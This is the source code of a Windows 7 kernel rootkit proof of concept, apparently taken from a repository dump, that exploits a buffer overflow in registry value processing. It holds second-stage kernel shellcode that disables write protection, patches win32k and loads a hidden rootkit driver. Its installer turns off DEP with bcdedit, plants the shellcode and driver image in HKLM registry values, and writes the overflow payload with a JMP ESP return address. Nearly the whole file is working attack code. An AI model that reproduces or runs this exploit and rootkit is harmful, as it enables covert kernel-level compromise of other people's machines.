0x00000024\r\n\r\n// RTL_REGISTRY_CONTROL | RTL_REGISTRY_OPTIONAL\r\n#define QUERY_REGISTRY_RELATIVETO 0x80000002\r\n\r\n#define QUERY_REGISTRY_TABLE_SIZE 0x38\r\n\r\n__declspec(naked) void Shellcode_2(void)\r\n{\r\n __asm \r\n {\r\n /**\r\n * 2-nd STAGE SHELLCODE BEGIN\r\n *\r\n * EBX - win32k!NtUserInitialize()\r\n * EDI - nt!MmIsAddressValid()\r\n *\r\n */\r\n\r\n#ifdef USE_SHELLCODE_DEBUGBREAK\r\n\r\n int 3\r\n#endif\r\n\r\n /**\r\n * Calculate shellcode address.\r\n */\r\n mov esi, ebx\r\n call _realloc\r\n\r\n_realloc:\r\n \r\n pop ebx\r\n sub ebx, _realloc\r\n\r\n /** \r\n * Find win32k address\r\n */\r\n xor si, si\r\n\r\n_find_win32:\r\n\r\n cmp word ptr [esi], IMAGE_DOS_SIGNATURE \r\n je _win32_ok\r\n sub esi, PAGE_SIZE\r\n jmp short _find_win32\r\n\r\n_win32_ok:\r\n\r\n mov [ebx + _params + _win32k_base], esi\r\n\r\n // get kernel image start addreess\r\n mov ecx, [ebx + _params + _MmIsAddressValid]\r\n sub edi, ecx\r\n mov [ebx + _params + _kernel_base], edi\r\n\r\n /**\r\n * Patch win32k!bInitializeEUDC() to prevent\r\n * multipile vulnerability triggering.\r\n */\r\n\r\n mov ecx, [ebx + _params + _bInitializeEUDC_patch]\r\n add ecx, esi\r\n\r\n // disable memory write protection\r\n mov eax, cr0 \r\n and eax, not 000010000h\r\n mov cr0, eax \r\n\r\n // perform patching with add esp, 0x14 / nop\r\n mov word ptr [ecx + 0], '\\x83\\xc4'\r\n mov word ptr [ecx + 2], '\\x14\\x90'\r\n\r\n // enable memory write protection which was supposed to do\r\n mov eax, cr0\r\n or eax, 000010000h\r\n mov cr0, eax\r\n\r\n /****************************************************\r\n * Place any payload here:\r\n */\r\n\r\n mov edx, [ebx + _params + _rootkit_size]\r\n add edx, 0x100\r\n mov ecx, [ebx + _params + _ExAllocatePool]\r\n add ecx, edi\r\n\r\n // call nt!ExAllocatePool() and allocate memory for rootkit image\r\n push edx\r\n push edx\r\n push 0\r\n call ecx\r\n pop edx\r\n test eax, eax\r\n jz _err_payload\r\n\r\n /*\r\n RtlQueryRegistryValues() remark:\r\n \r\n The buffer pointed to by EntryContext must begin with a signed \r\n LONG value. The magnitude of the value must specify the size, \r\n in bytes, of the buffer.\r\n */\r\n neg edx\r\n mov [eax], edx\r\n mov ebp, eax\r\n\r\n /*\r\n RTL_QUERY_REGISTRY_TABLE (0x1c bytes):\r\n\r\n +00 QueryRoutine\r\n +04 Flags\r\n +08 Name\r\n +0c EntryContext\r\n +10 DefaultType\r\n +14 DefaultData\r\n +18 DefaultLength\r\n */\r\n\r\n // allocate memory for RTL_QUERY_REGISTRY_TABLE[2]\r\n mov edx, esp\r\n mov ecx, QUERY_REGISTRY_TABLE_SIZE\r\n sub esp, ecx\r\n \r\n // fill with zero bytes\r\n push edx\r\n xchg edi, edx \r\n xor eax, eax\r\n rep stosb\r\n xchg edi, edx\r\n pop edx\r\n\r\n // filling the structure\r\n mov dword ptr [edx + 0x04], QUERY_REGISTRY_TABLE_FLAGS \r\n lea eax, [ebx + _drv_val_name]\r\n mov [edx + 0x08], eax\r\n mov [edx + 0x0c], ebp\r\n\r\n push 0\r\n push 0\r\n push edx\r\n push 0\r\n push QUERY_REGISTRY_RELATIVETO\r\n\r\n // call nt!RtlQueryRegistryValues()\r\n mov ecx, [ebx + _params + _RtlQueryRegistryValues]\r\n add ecx, edi\r\n call ecx\r\n\r\n add esp, QUERY_REGISTRY_TABLE_SIZE\r\n\r\n test eax, eax\r\n jnz _err_payload\r\n\r\n // check for DOS signature of readed data\r\n cmp word ptr [ebp], IMAGE_DOS_SIGNATURE \r\n jne _err_payload\r\n\r\n mov [ebx + _params + _rootkit_base], ebp\r\n\r\n mov ecx, ebp\r\n add ecx, [ecx + 0x3C] // IMAGE_DOS_HEADER::e_lfanew\r\n mov ecx, [ecx + 0x28] // IMAGE_OPTIONAL_HEADER::AddressOfEntryPoint\r\n add ecx, ebp\r\n\r\n // call image entry point\r\n lea eax, [ebx + _params]\r\n push eax // RegistryPath argument\r\n push 0 // DriverObject argument\r\n call ecx\r\n\r\n_err_payload:\r\n\r\n#ifdef USE_SHELLCODE_DBGPRINT\r\n\r\n lea ecx, [ebx + _params + _szDbgPrintMessage]\r\n push ecx\r\n\r\n // call nt!DbgPrint()\r\n mov ecx, [ebx + _params + _DbgPrint]\r\n add ecx, edi\r\n call ecx\r\n pop eax\r\n\r\n#endif\r\n /****************************************************/\r\n\r\n /**\r\n * Make the rest of the stuff that had to be made\r\n * by the win32k!NtUserInitialize()\r\n */\r\n\r\n // get current process\r\n mov ecx, [ebx + _params + _PsGetCurrentProcess]\r\n add ecx, edi\r\n call ecx\r\n\r\n // set flags in PROCESSINFO\r\n mov ecx, [ebx + _params + _PsGetProcessWin32Process]\r\n add ecx, edi\r\n push eax\r\n call ecx\r\n add eax, 8\r\n or dword ptr [eax], WIN32_PROCESS_FLAGS\r\n\r\n // call win32k!UserInitialize()\r\n mov ecx, [ebx + _params + _UserInitialize]\r\n add ecx, esi\r\n call ecx\r\n\r\n /**\r\n * Return back to the nt!_KiFastCallEntry() \r\n * with STATUS_SUCCESS.\r\n */\r\n\r\n // get kernel image end addreess\r\n mov ecx, edi\r\n add ecx, [ecx + 0x3C] // IMAGE_DOS_HEADER::e_lfanew\r\n mov ecx, [ecx + 0x50] // IMAGE_OPTIONAL_HEADER::SizeOfImage\r\n add ecx, edi \r\n\r\n // get kernel image start addreess\r\n mov ebp, [ebx + _params + _MmIsAddressValid]\r\n add ebp, edi\r\n\r\n_find_ki_ret:\r\n\r\n // Lookup for nt!_KiFastCallEntry()+XX and EBP value in stack.\r\n mov ebx, edx\r\n pop edx\r\n\r\n // check for the kernel pointer\r\n cmp edx, edi\r\n jb _find_ki_ret\r\n\r\n cmp edx, ecx\r\n ja _find_ki_ret\r\n\r\n pushad\r\n\r\n // check for valid address\r\n push edx\r\n call ebp\r\n test al, al\r\n\r\n popad\r\n \r\n jz _find_ki_ret\r\n\r\n /*\r\n Check for the instruction, at return address from the system service:\r\n\r\n call ebx ; system service call \r\n test byte ptr [ebp+6Ch], 1 ; returns here\r\n jz short loc_4357D4\r\n ...\r\n */\r\n cmp word ptr [edx], '\\xf6\\x45'\r\n jne _find_ki_ret\r\n\r\n \r\n // return to the nt!_KiFastCallEntry() with STATUS_SUCCESS\r\n xor eax, eax\r\n mov ebp, ebx\r\n jmp edx\r\n\r\n_drv_val_name:\r\n\r\n EMIT('P' _ '\\x0' _ 'C' _ '\\x0' _ 'I' _ '\\x0' _ '\\x0' _ '\\x0')\r\n\r\n_params:\r\n /** \r\n * Shellcode constants, see SC_PARAMS struct above\r\n */\r\n }\r\n\r\n // end marker\r\n EMIT('~' _ 'E' _ 'N' _ 'D')\r\n}\r\n//--------------------------------------------------------------------------------------\r\nDWORD ScGetSize(PDWORD pData)\r\n{\r\n DWORD dwSize = 0;\r\n PDWORD Ptr = pData;\r\n\r\n // get size of code\r\n while (*Ptr != ENDM)\r\n {\r\n dwSize++;\r\n\r\n // check for the end marker\r\n Ptr = (PDWORD)((DWORD)Ptr + 1); \r\n }\r\n\r\n return dwSize;\r\n}\r\n//--------------------------------------------------------------------------------------\r\nBOOL ScWriteDword(PVOID pData, DWORD dwSize, DWORD dwMarker, DWORD dwValue)\r\n{\r\n // find value pisition in bytes buffer by marker\r\n for (DWORD i = 0; i < dwSize - sizeof(DWORD); i++)\r\n {\r\n if (*(PDWORD)((PUCHAR)pData + i) == dwMarker)\r\n {\r\n // replace marker with the value\r\n *(PDWORD)((PUCHAR)pData + i) = dwValue;\r\n return TRUE;\r\n }\r\n }\r\n\r\n return FALSE;\r\n}\r\n//--------------------------------------------------------------------------------------\r\n/**\r\n * Constants for win32k.sys image analysis.\r\n */\r\n#define WIN32K_STR_1 L\"\\\\Windows\\\\WindowStations\"\r\n#define WIN32K_STR_2 L\"FontLinkDefaultChar\"\r\n\r\n#define WIN32K_STDCALL_PROLOG \"\\x8b\\xff\\x55\\x8b\\xec\"\r\n#define WIN32K_STDCALL_PROLOG_LEN 5\r\n\r\nBOOL AnalyseWin32k(PDWORD poffset_UserInitialize, PDWORD poffset_bInitializeEUDC_patch)\r\n{\r\n DWORD offset_UserInitialize = 0;\r\n DWORD offset_bInitializeEUDC_patch = 0;\r\n\r\n char szPath[MAX_PATH];\r\n GetSystemDirectory(szPath, MAX_PATH);\r\n strcat_s(szPath, MAX_PATH, \"\\\\win32k.sys\");\r\n\r\n HMODULE hMod = LoadLibraryEx(szPath, NULL, DONT_RESOLVE_DLL_REFERENCES);\r\n if (hMod)\r\n {\r\n PIMAGE_NT_HEADERS32 pHeaders32 = (PIMAGE_NT_HEADERS32)\r\n ((PUCHAR)hMod + ((PIMAGE_DOS_HEADER)hMod)->e_lfanew);\r\n \r\n PIMAGE_SECTION_HEADER pSection = NULL, pCodeSection = NULL;\r\n PIMAGE_BASE_RELOCATION pRelocation = NULL;\r\n ULONG RelocationSize = 0, NumberOfSections = 0; \r\n ULONGLONG OldBase = 0;\r\n\r\n if (pHeaders32->FileHeader.Machine == IMAGE_FILE_MACHINE_I386)\r\n {\r\n // 32-bit image\r\n if (pHeaders32->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress)\r\n {\r\n pRelocation = (PIMAGE_BASE_RELOCATION)RVATOVA(\r\n hMod,\r\n pHeaders32->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress\r\n );\r\n\r\n RelocationSize = pHeaders32->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size;\r\n }\r\n\r\n OldBase = (ULONGLONG)pHeaders32->OptionalHeader.ImageBase;\r\n NumberOfSections = pHeaders32->FileHeader.NumberOfSections; \r\n\r\n pSection = (PIMAGE_SECTION_HEADER)\r\n (pHeaders32->FileHeader.SizeOfOptionalHeader + \r\n (PUCHAR)&pHeaders32->OptionalHeader); \r\n } \r\n else if (pHeaders32->FileHeader.Machine == IMAGE_FILE_MACHINE_AMD64)\r\n {\r\n // 64-bit image\r\n PIMAGE_NT_HEADERS64 pHeaders64 = (PIMAGE_NT_HEADERS64)\r\n ((PUCHAR)hMod + ((PIMAGE_DOS_HEADER)hMod)->e_lfanew);\r\n\r\n if (pHeaders64->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress)\r\n {\r\n pRelocation = (PIMAGE_BASE_RELOCATION)RVATOVA(\r\n hMod,\r\n pHeaders64->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress\r\n );\r\n\r\n RelocationSize = pHeaders64->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size;\r\n }\r\n\r\n OldBase = pHeaders64->OptionalHeader.ImageBase;\r\n NumberOfSections = pHeaders64->FileHeader.NumberOfSections;\r\n\r\n pSection = (PIMAGE_SECTION_HEADER)\r\n (pHeaders64->FileHeader.SizeOfOptionalHeader + \r\n (PUCHAR)&pHeaders64->OptionalHeader);\r\n }\r\n else\r\n {\r\n DbgMsg(__FILE__, __LINE__, __FUNCTION__\"() ERROR: Unkown machine type\\n\");\r\n FreeLibrary(hMod);\r\n return FALSE;\r\n }\r\n\r\n // enumerate image sections \r\n for (ULONG i = 0; i < NumberOfSections; i++)\r\n {\r\n // find section, that contains global variable\r\n if (!strncmp((char *)&pSection->Name, \".text\", 5))\r\n { \r\n pCodeSection = pSection;\r\n break;\r\n }\r\n\r\n pSection += 1;\r\n }\r\n\r\n if (pRelocation && pCodeSection)\r\n {\r\n // parse image relocation table\r\n ULONG Size = 0;\r\n while (RelocationSize > Size && pRelocation->SizeOfBlock)\r\n { \r\n ULONG Number = (pRelocation->SizeOfBlock - 8) / 2;\r\n PUSHORT Rel = (PUSHORT)((PUCHAR)pRelocation + 8); \r\n\r\n for (ULONG i = 0; i < Number; i++)\r\n {\r\n if (Rel[i] > 0)\r\n {\r\n USHORT Type = (Rel[i] & 0xF000) >> 12;\r\n ULONG Rva = 0;\r\n PVOID *Va = NULL;\r\n\r\n // get address of global variable that used by our instruction\r\n if (Type == IMAGE_REL_BASED_HIGHLOW ||\r\n Type == IMAGE_REL_BASED_DIR64)\r\n {\r\n Rva = pRelocation->VirtualAddress + (Rel[i] & 0x0FFF);\r\n Va = (PVOID *)RVATOVA(hMod, Rva);\r\n }\r\n else\r\n {\r\n DbgMsg(__FILE__, __LINE__, __FUNCTION__ \"() ERROR: Unknown relocation type (%d)\\n\", Type);\r\n }\r\n\r\n if (Va && Rva > 0 &&\r\n Rva > pCodeSection->VirtualAddress &&\r\n Rva < pCodeSection->VirtualAddress + pCodeSection->Misc.VirtualSize)\r\n { \r\n // get address of global variable, that requre fixup\r\n PVOID VarAddr = *Va;\r\n VarAddr = (PVOID)((ULONGLONG)VarAddr - OldBase + (PUCHAR)hMod);\r\n\r\n if (!IsBadStringPtrW((LPWSTR)VarAddr, MAX_PATH))\r\n {\r\n if (!wcscmp((LPWSTR)VarAddr, WIN32K_STR_1))\r\n {\r\n DbgMsg(\r\n __FILE__, __LINE__, \r\n __FUNCTION__\"(): \\\"%ws\\\" referenced at offset 0x%.8x\\n\", \r\n WIN32K_STR_1, Rva\r\n );\r\n\r\n // lookup for stdcall prolog of win32k!UserInitialize()\r\n for (DWORD i = 0; i < 50; i++)\r\n {\r\n if (!memcmp(\r\n (PUCHAR)Va - i, \r\n WIN32K_STDCALL_PROLOG,\r\n WIN32K_STDCALL_PROLOG_LEN))\r\n {\r\n if (offset_UserInitialize > 0)\r\n {\r\n DbgMsg(\r\n __FILE__, __LINE__, \r\n __FUNCTION__\"() ERROR: multipile heuristic matches for win32k!UserInitialize()\\n\"\r\n );\r\n\r\n FreeLibrary(hMod);\r\n return FALSE;\r\n }\r\n\r\n offset_UserInitialize = Rva - i;\r\n\r\n DbgMsg(\r\n __FILE__, __LINE__, \r\n __FUNCTION__\"(): win32k!UserInitialize() found at offset 0x%.8x\\n\", \r\n offset_UserInitialize\r\n );\r\n\r\n break;\r\n }\r\n }\r\n }\r\n else if (!wcscmp((LPWSTR)VarAddr, WIN32K_STR_2))\r\n {\r\n DbgMsg(\r\n __FILE__, __LINE__, \r\n __FUNCTION__\"(): \\\"%ws\\\" referenced at offset 0x%.8x\\n\", \r\n WIN32K_STR_2, Rva\r\n );\r\n\r\n /*\r\n Check for the following code in win32k!bInitializeEUDC():\r\n\r\n mov ?SharedQueryTable@@A.Name, offset aFontlinkdefaul ; \"FontLinkDefaultChar\"\r\n mov ?SharedQueryTable@@A.EntryContext, eax\r\n call edi ; RtlQueryRegistryValues(x,x,x,x,x)\r\n test eax, eax\r\n jge short loc_BF80525F\r\n\r\n */\r\n LONG InstPtr = -6;\r\n PUCHAR pInst = (PUCHAR)Va; \r\n\r\n if (*(PUSHORT)(pInst + InstPtr) == 0x05c7)\r\n {\r\n // disassemble next 5 instructions\r\n for (DWORD i = 0; i < 5; i++)\r\n {\r\n LONG InstLen = (LONG)c_Catchy(pInst + InstPtr);\r\n if (InstLen == (LONG)CATCHY_ERROR)\r\n {\r\n DbgMsg(__FILE__, __LINE__, __FUNCTION__\"() ERROR: c_Catchy() fails\\n\");\r\n FreeLibrary(hMod);\r\n return FALSE;\r\n }\r\n\r\n InstPtr += InstLen;\r\n\r\n // check for call edi / test eax, eax\r\n if (*(PUSHORT)(pInst + InstPtr + 0) == 0xd7ff &&\r\n *(PUSHORT)(pInst + InstPtr + 2) == 0xc085)\r\n {\r\n if (offset_bInitializeEUDC_patch > 0)\r\n {\r\n DbgMsg(\r\n __FILE__, __LINE__, \r\n __FUNCTION__\"() ERROR: multipile heuristic matches for win32k!bInitializeEUDC()\\n\"\r\n );\r\n\r\n FreeLibrary(hMod);\r\n return FALSE;\r\n }\r\n\r\n offset_bInitializeEUDC_patch = Rva + InstPtr;\r\n\r\n DbgMsg(\r\n __FILE__, __LINE__, \r\n __FUNCTION__\"(): win32k!bInitializeEUDC() CALL EDI found at offset 0x%.8x\\n\", \r\n offset_bInitializeEUDC_patch\r\n );\r\n\r\n break;\r\n } \r\n }\r\n }\r\n }\r\n }\r\n } \r\n }\r\n }\r\n\r\n pRelocation = (PIMAGE_BASE_RELOCATION)((PUCHAR)pRelocation + pRelocation->SizeOfBlock);\r\n Size += pRelocation->SizeOfBlock;\r\n }\r\n }\r\n else\r\n {\r\n DbgMsg(__FILE__, __LINE__, __FUNCTION__ \"() ERROR: Relocation directory not found\\n\");\r\n }\r\n\r\n FreeLibrary(hMod);\r\n }\r\n else\r\n {\r\n DbgMsg(__FILE__, __LINE__, __FUNCTION__\"(): LoadLibraryEx() ERROR %d\\n\", GetLastError());\r\n }\r\n\r\n if (offset_UserInitialize > 0 &&\r\n offset_bInitializeEUDC_patch > 0)\r\n {\r\n *poffset_UserInitialize = offset_UserInitialize;\r\n *poffset_bInitializeEUDC_patch = offset_bInitializeEUDC_patch;\r\n return TRUE;\r\n }\r\n\r\n return FALSE;\r\n}\r\n//--------------------------------------------------------------------------------------\r\n#define GET_KERNEL_PROC_OFFSET(_fn_) \\\r\n \\\r\n DWORD offset_##_fn_ = (DWORD)GetKernelProcOffset(#_fn_); \\\r\n if (offset_##_fn_ == NULL) \\\r\n { \\\r\n DbgMsg(__FILE__, __LINE__, \"ERROR: nt!\" #_fn_ \"() is not found\\n\"); \\\r\n goto end; \\\r\n } \\\r\n else \\\r\n { \\\r\n DbgMsg( \\\r\n __FILE__, __LINE__, \"nt!\" #_fn_ \"() offset is 0x%.8x\\n\", \\\r\n offset_##_fn_ \\\r\n ); \\\r\n }\r\n\r\nint _tmain(int argc, _TCHAR* argv[])\r\n{\r\n DbgMsg(\r\n __FILE__, __LINE__, \r\n \"\\n***********************************************************\\n\\n\"\r\n \" Windows kernrel rootkit PoC using registry values processing BoF.\\n\"\r\n \" FOR INTERNAL USE ONLY!\\n\\n\"\r\n \" (c) 2012 Oleksiuk Dmytro (aka Cr4sh)\\n\"\r\n \" cr4sh@riseup.net\\n\"\r\n \"\\n***********************************************************\\n\\n\"\r\n );\r\n\r\n BOOL bSupportedOS = TRUE;\r\n\r\n#if defined(_X86_)\r\n\r\n BOOL bIs64 = FALSE;\r\n\r\n typedef BOOL (WINAPI * func_IsWow64Process)(\r\n HANDLE hProcess,\r\n PBOOL Wow64Process\r\n );\r\n\r\n func_IsWow64Process f_IsWow64Process = (func_IsWow64Process)\r\n GetProcAddress(GetModuleHandle(\"kernel32.dll\"), \"IsWow64Process\");\r\n if (f_IsWow64Process)\r\n {\r\n // check for WOW64 environment\r\n f_IsWow64Process(GetCurrentProcess(), &bIs64);\r\n }\r\n\r\n bSupportedOS = !bIs64; \r\n\r\n#endif // _X86_\r\n\r\n OSVERSIONINFOA Version; \r\n Version.dwOSVersionInfoSize = sizeof(OSVERSIONINFOA); \r\n if (GetVersionExA(&Version))\r\n {\t\t \r\n if (Version.dwPlatformId != VER_PLATFORM_WIN32_NT ||\r\n Version.dwMajorVersion != 6 || Version.dwMinorVersion != 1)\r\n {\r\n bSupportedOS = FALSE; \r\n } \r\n }\r\n else\r\n {\r\n DbgMsg(__FILE__, __LINE__, \"GetVersionEx() ERROR %d\\n\", GetLastError());\r\n goto end; \r\n }\r\n\r\n if (!bSupportedOS)\r\n {\r\n MessageBox(\r\n 0, \r\n \"This PoC supports only x86 versions of Windows 7 and Server 2008 R2\",\r\n \"ERROR\",\r\n MB_ICONERROR\r\n );\r\n\r\n return -1;\r\n }\r\n\r\n // check for the uninstall option\r\n if (argc >= 2 && !strcmp(argv[1], \"--uninstall\"))\r\n {\r\n DbgMsg(\r\n __FILE__, __LINE__, \r\n \"[+] Deleting 1-st shellcode from \\\"%s\\\\%s\\\"...\\n\", EXPL_KEY, EXPL_VAL\r\n );\r\n\r\n HKEY hKey;\r\n LONG Code = RegOpenKey(HKEY_LOCAL_MACHINE, EXPL_KEY, &hKey);\r\n if (Code == ERROR_SUCCESS)\r\n {\r\n // delete first rootkit part\r\n Code = RegDeleteValue(hKey, EXPL_VAL);\r\n if (Code == ERROR_SUCCESS)\r\n {\r\n DbgMsg(__FILE__, __LINE__, \"[+] DELETED\\n\");\r\n }\r\n else if (Code == ERROR_FILE_NOT_FOUND)\r\n {\r\n DbgMsg(__FILE__, __LINE__, \"[!] NOT FOUND\\n\");\r\n }\r\n else\r\n {\r\n DbgMsg(__FILE__, __LINE__, \"RegDeleteValue() ERROR %d\\n\", Code);\r\n }\r\n\r\n RegCloseKey(hKey);\r\n }\r\n else\r\n {\r\n DbgMsg(__FILE__, __LINE__, \"RegOpenKey() ERROR %d\\n\", Code);\r\n }\r\n\r\n DbgMsg(__FILE__, __LINE__, \"[+] Deleting 2-nd shellcode from \\\"%s\\\\%s\\\"...\\n\", SC2_KEY, SC2_VAL);\r\n\r\n Code = RegOpenKey(HKEY_LOCAL_MACHINE, SC2_KEY, &hKey);\r\n if (Code == ERROR_SUCCESS)\r\n {\r\n // delete first rootkit part\r\n Code = RegDeleteValue(hKey, SC2_VAL);\r\n if (Code == ERROR_SUCCESS)\r\n {\r\n DbgMsg(__FILE__, __LINE__, \"[+] DELETED\\n\");\r\n }\r\n else if (Code == ERROR_FILE_NOT_FOUND)\r\n {\r\n DbgMsg(__FILE__, __LINE__, \"[!] NOT FOUND\\n\");\r\n }\r\n else\r\n {\r\n DbgMsg(__FILE__, __LINE__, \"RegDeleteValue() ERROR %d\\n\", Code);\r\n }\r\n\r\n RegCloseKey(hKey);\r\n }\r\n else\r\n {\r\n DbgMsg(__FILE__, __LINE__, \"RegOpenKey() ERROR %d\\n\", Code);\r\n }\r\n\r\n MessageBox(0, \"Rootkit uninstalled!\", \"SUCCESS\", MB_ICONINFORMATION);\r\n\r\n return 0;\r\n }\r\n\r\n if (argc >= 2 && !strcmp(argv[1], \"--dbgbreaks\"))\r\n {\r\n m_DebugBreaks = TRUE;\r\n }\r\n\r\n DbgMsg(__FILE__, __LINE__, \"[+] Disabling DEP...\\n\");\r\n system(\"bcdedit.exe /set {current} nx AlwaysOff\");\r\n system(\"bcdedit.exe /set {current} pae ForceEnable\");\r\n\r\n DWORD dwShellcodeSize_1 = ScGetSize((PDWORD)Shellcode_1);\r\n DWORD dwShellcodeSize_2 = ScGetSize((PDWORD)Shellcode_2);\r\n \r\n DbgMsg(__FILE__, __LINE__, \"[+] 1-st shellcode size is %d bytes\\n\", dwShellcodeSize_1);\r\n DbgMsg(__FILE__, __LINE__, \"[+] 2-nd shellcode size is %d bytes\\n\", dwShellcodeSize_2); \r\n\r\n DWORD offset_UserInitialize = 0;\r\n DWORD offset_bInitializeEUDC_patch = 0;\r\n\r\n // find unexported functions of win32k, that are needed for exploitation\r\n if (!AnalyseWin32k(&offset_UserInitialize, &offset_bInitializeEUDC_patch))\r\n {\r\n DbgMsg(__FILE__, __LINE__, \"ERROR: win32k.sys image analysis fails\\n\");\r\n goto end;\r\n }\r\n\r\n GET_KERNEL_PROC_OFFSET(MmIsAddressValid);\r\n GET_KERNEL_PROC_OFFSET(PsGetCurrentProcess);\r\n GET_KERNEL_PROC_OFFSET(PsGetProcessWin32Process); \r\n GET_KERNEL_PROC_OFFSET(ExAllocatePool);\r\n GET_KERNEL_PROC_OFFSET(RtlQueryRegistryValues);\r\n GET_KERNEL_PROC_OFFSET(DbgPrint);\r\n\r\n HKEY hKey;\r\n LONG Code = RegOpenKey(HKEY_LOCAL_MACHINE, SC2_KEY, &hKey);\r\n if (Code == ERROR_SUCCESS)\r\n {\r\n int Ptr = 0, SignLen = lstrlen(REG_SIGN_FULL);\r\n\r\n UCHAR Buff[SHELLCODE_2_MAX_BUFF_SIZE];\r\n FillMemory(&Buff, sizeof(Buff), 0x90); \r\n \r\n for (int i = 0; i <= 16; i++)\r\n {\r\n /**\r\n * Place signatures at different offsets from the \r\n * begining of the buffer.\r\n *\r\n * kd> s 0x8d000000 Lffffff 0x40 0x50 0x41 0x51 0x90\r\n *\r\n */\r\n memcpy(&Buff[Ptr + i], REG_SIGN_FULL, SignLen);\r\n Ptr += 16;\r\n }\r\n\r\n if (SHELLCODE_2_MAX_BUFF_SIZE - (DWORD)Ptr <= dwShellcodeSize_2)\r\n {\r\n DbgMsg(__FILE__, __LINE__, \"ERROR: Buffer to small\\n\");\r\n goto end;\r\n }\r\n\r\n // copy 2-nd shellcode to the buffer\r\n memcpy(&Buff[Ptr], Shellcode_2, dwShellcodeSize_2);\r\n PSC_PARAMS ShellcodeParams = (PSC_PARAMS)(&Buff[Ptr + dwShellcodeSize_2]);\r\n ZeroMemory(ShellcodeParams, sizeof(SC_PARAMS));\r\n\r\n if (Buff[Ptr] == 0xcc && !m_DebugBreaks)\r\n {\r\n // remove debug break\r\n Buff[Ptr] = 0x90;\r\n }\r\n\r\n // set constants and parameters for 2-nd shellcode\r\n ShellcodeParams->offset_MmIsAddressValid = offset_MmIsAddressValid;\r\n ShellcodeParams->offset_PsGetCurrentProcess = offset_PsGetCurrentProcess;\r\n ShellcodeParams->offset_PsGetProcessWin32Process = offset_PsGetProcessWin32Process;\r\n ShellcodeParams->offset_ExAllocatePool = offset_ExAllocatePool;\r\n ShellcodeParams->offset_RtlQueryRegistryValues = offset_RtlQueryRegistryValues;\r\n ShellcodeParams->offset_UserInitialize = offset_UserInitialize;\r\n ShellcodeParams->offset_bInitializeEUDC_patch = offset_bInitializeEUDC_patch;\r\n ShellcodeParams->rootkit_size = sizeof(rootkit_driver);\r\n\r\n#ifdef USE_SHELLCODE_DBGPRINT\r\n\r\n ShellcodeParams->offset_DbgPrint = offset_DbgPrint;\r\n strcpy_s(ShellcodeParams->szDbgPrintMessage, DBGPRINT_MESSAGE_LEN, DBGPRINT_MESSAGE);\r\n\r\n#endif\r\n\r\n DbgMsg(__FILE__, __LINE__, \"[+] Saving 2-nd shellcode to \\\"%s\\\\%s\\\"...\\n\", SC2_KEY, SC2_VAL);\r\n\r\n Code = RegSetValueEx(hKey, SC2_VAL, 0, REG_BINARY, (PBYTE)&Buff, sizeof(Buff));\r\n if (Code != ERROR_SUCCESS)\r\n {\r\n DbgMsg(__FILE__, __LINE__, \"RegSetValueEx() ERROR %d\\n\", Code);\r\n } \r\n else\r\n {\r\n DbgMsg(__FILE__, __LINE__, \"[+] SUCCESS\\n\");\r\n }\r\n\r\n DbgMsg(__FILE__, __LINE__, \"[+] Saving rootkit image to \\\"%s\\\\%s\\\"...\\n\", SC2_KEY, DRV_VAL);\r\n\r\n Code = RegSetValueEx(hKey, DRV_VAL, 0, REG_BINARY, (PBYTE)&rootkit_driver, sizeof(rootkit_driver));\r\n if (Code != ERROR_SUCCESS)\r\n {\r\n DbgMsg(__FILE__, __LINE__, \"RegSetValueEx() ERROR %d\\n\", Code);\r\n } \r\n else\r\n {\r\n DbgMsg(__FILE__, __LINE__, \"[+] SUCCESS\\n\");\r\n }\r\n\r\n RegCloseKey(hKey);\r\n }\r\n else\r\n {\r\n DbgMsg(__FILE__, __LINE__, \"RegOpenKey() ERROR %d\\n\", Code);\r\n }\r\n\r\n DWORD dwDataSize = BOF_MIN_LENGTH + dwShellcodeSize_1;\r\n PVOID pData = malloc(dwDataSize);\r\n if (pData)\r\n {\r\n *(PDWORD)((PUCHAR)pData + BOF_RET_OFFSET) = JMP_ESP_ADDR; \r\n memcpy((PUCHAR)pData + BOF_MIN_LENGTH, Shellcode_1, dwShellcodeSize_1);\r\n\r\n if (*((PUCHAR)pData + BOF_MIN_LENGTH) == 0xcc && !m_DebugBreaks)\r\n {\r\n // remove debug break\r\n *((PUCHAR)pData + BOF_MIN_LENGTH) = 0x90;\r\n }\r\n\r\n ScWriteDword(\r\n (PUCHAR)pData + BOF_MIN_LENGTH, dwShellcodeSize_1,\r\n marker_MmIsAddressValid, offset_MmIsAddressValid\r\n );\r\n\r\n DbgMsg(__FILE__, __LINE__, \"[+] Adding malicious data for value \\\"%s\\\\%s\\\"...\\n\", EXPL_KEY, EXPL_VAL);\r\n\r\n Code = RegOpenKey(HKEY_LOCAL_MACHINE, EXPL_KEY, &hKey);\r\n if (Code == ERROR_SUCCESS)\r\n {\r\n // set malicious value\r\n Code = RegSetValueEx(hKey, EXPL_VAL, 0, REG_BINARY, (PBYTE)pData, dwDataSize);\r\n if (Code != ERROR_SUCCESS)\r\n {\r\n DbgMsg(__FILE__, __LINE__, \"RegSetValueEx() ERROR %d\\n\", Code);\r\n } \r\n else\r\n {\r\n DbgMsg(__FILE__, __LINE__, \"[+] SUCCESS\\n\");\r\n\r\n if (MessageBox(\r\n 0, \r\n \"Rootkit installed, rebot the box now?\", \r\n \"SUCCESS\", \r\n MB_ICONINFORMATION | MB_YESNO) == IDYES)\r\n {\r\n // reboot the system\r\n LoadPrivileges(SE_SHUTDOWN_NAME);\r\n ExitWindowsEx(EWX_REBOOT, SHTDN_REASON_MAJOR_APPLICATION);\r\n return 0;\r\n } \r\n }\r\n\r\n RegCloseKey(hKey);\r\n }\r\n else\r\n {\r\n DbgMsg(__FILE__, __LINE__, \"RegOpenKey() ERROR %d\\n\", Code);\r\n }\r\n\r\n free(pData);\r\n }\r\n\r\nend:\r\n printf(\"Press any key to quit...\\n\");\r\n _getch();\r\n\r\n\treturn 0;\r\n}\r\n//--------------------------------------------------------------------------------------\r\n// EoF\r\n" }, { "path": "src/rootkit_installer/rootkit_installer.vcproj", "content": 